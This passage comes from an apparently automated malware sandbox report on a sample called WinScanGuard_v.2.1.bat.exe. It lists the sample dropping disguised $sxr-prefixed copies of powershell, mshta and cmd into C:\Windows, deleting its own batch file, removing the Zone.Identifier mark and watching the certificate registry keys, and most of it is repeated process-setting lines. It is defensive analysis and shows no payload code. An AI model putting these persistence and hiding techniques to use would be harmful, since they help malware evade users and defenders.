              Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000026A879D870D push rcx; retf 003Fh31_2_0000026A879D870E
              Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000026A87F5950D push rcx; retf 003Fh31_2_0000026A87F5950E
              Source: C:\Windows\System32\svchost.exeCode function: 36_2_000001795378870D push rcx; retf 003Fh36_2_000001795378870E
              Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000179537B950D push rcx; retf 003Fh36_2_00000179537B950E
              Source: C:\Windows\System32\svchost.exeCode function: 36_2_0000017953D5950D push rcx; retf 003Fh36_2_0000017953D5950E
              Source: C:\Windows\$sxr-mshta.exeCode function: 13_2_00007FF7142F1008 GetVersion,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,FreeLibrary,RegOpenKeyExA,RegQueryValueExA,ExpandEnvironmentStringsA,LoadLibraryA,RegCloseKey,GetModuleHandleW,GetProcAddress,MultiByteToWideChar,UnregisterApplicationRestart,GetProcAddress,FreeLibrary,RegCloseKey,13_2_00007FF7142F1008
              Source: WinScanGuard_v.2.1.bat.exe.0.drStatic PE information: 0x7EDA4115 [Wed Jun 10 07:45:25 2037 UTC]
              Source: $sxr-cmd.exe.2.drStatic PE information: section name: .didat

              Persistence and Installation Behavior

              barindex
              Source: C:\Windows\$sxr-powershell.exeExecutable created and started: C:\Windows\$sxr-powershell.exeJump to behavior
              Source: C:\Windows\$sxr-mshta.exeExecutable created and started: C:\Windows\$sxr-cmd.exeJump to behavior
              Source: unknownExecutable created and started: C:\Windows\$sxr-mshta.exe
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeFile created: C:\Windows\$sxr-cmd.exeJump to dropped file
              Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeJump to dropped file
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeFile created: C:\Windows\$sxr-powershell.exeJump to dropped file
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeFile created: C:\Windows\$sxr-mshta.exeJump to dropped file
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeFile created: C:\Windows\$sxr-cmd.exeJump to dropped file
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeFile created: C:\Windows\$sxr-powershell.exeJump to dropped file
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeFile created: C:\Windows\$sxr-mshta.exeJump to dropped file

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeFile deleted: c:\users\user\desktop\winscanguard_v.2.1.batJump to behavior
              Source: C:\Windows\$sxr-powershell.exeFile opened: C:\Windows\$sxr-powershell.exe:Zone.Identifier read attributes | deleteJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
